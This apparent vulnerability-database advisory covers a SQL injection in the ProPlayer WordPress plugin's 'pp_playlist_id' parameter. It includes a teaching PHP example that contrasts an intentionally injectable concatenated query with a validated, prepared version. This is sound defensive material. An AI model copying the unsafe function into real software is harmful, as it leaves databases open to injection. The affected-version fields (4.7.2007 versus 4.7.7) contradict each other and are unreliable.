Vendor: ProPlayer
By: Miroslav Stampar
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: ProPlayer
Affected Version From: 4.7.2007
Affected Version To: 4.7.2007
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:proplayer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011
ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
A SQL injection vulnerability exists in ProPlayer plugin version 4.7.7 and earlier. The vulnerability occurs because the application does not properly sanitize user-supplied input passed in the 'pp_playlist_id' parameter of the 'playlist-controller.php' script before using it in a database query. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before it is passed to a SQL query. It is recommended to use prepared statements, parameterized queries, or stored procedures when interacting with the database, so that untrusted values are always bound as data and can never alter the structure of the query.
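The following is an added example illustrating the mitigation above; it is not code from the ProPlayer plugin or from the advisory author. It shows a hypothetical playlist lookup written first with the request parameter concatenated into the SQL string (the pattern the advisory describes) and then the hardened form using WordPress's $wpdb->prepare(). The table name 'proplayer_playlists', the column names, the function names, and the use of $_REQUEST for the 'pp_playlist_id' parameter are all assumptions made for the example.

```php
<?php
// Added example, not ProPlayer's own code. Assumes WordPress's global $wpdb.
// Table and column names are invented for illustration.

// UNSAFE: the request value is concatenated straight into the query text, so
// any input that is not a plain integer can change the shape of the statement.
function pp_get_playlist_unsafe( $playlist_id ) {
    global $wpdb;
    $sql = "SELECT * FROM {$wpdb->prefix}proplayer_playlists WHERE id = " . $playlist_id;
    return $wpdb->get_results( $sql );
}

// SAFE: validate the type first, then bind the value as a parameter.
function pp_get_playlist_safe( $playlist_id ) {
    global $wpdb;

    // Step 1: input validation. A playlist id is only ever a positive integer;
    // anything else is rejected before it gets near the database.
    $id = filter_var(
        $playlist_id,
        FILTER_VALIDATE_INT,
        array( 'options' => array( 'min_range' => 1 ) )
    );
    if ( false === $id ) {
        return null;
    }

    // Step 2: parameterized query. $wpdb->prepare() substitutes %d with the
    // integer value, so the bound value is always treated as data, never as SQL.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}proplayer_playlists WHERE id = %d",
        $id
    );
    return $wpdb->get_results( $sql );
}

// Hypothetical call site in a controller handling the request parameter.
$playlist_id = isset( $_REQUEST['pp_playlist_id'] ) ? $_REQUEST['pp_playlist_id'] : '';
$rows = pp_get_playlist_safe( $playlist_id );
if ( null === $rows ) {
    // Invalid id: respond with an error instead of running any query.
    wp_die( 'Invalid playlist id.', 'Bad Request', array( 'response' => 400 ) );
}
```

The two steps are complementary rather than alternatives: validation rejects malformed input early and gives a clear error, while the prepared statement guarantees that even a value which passes validation cannot be interpreted as SQL. For string parameters, the same pattern applies with the %s placeholder in $wpdb->prepare().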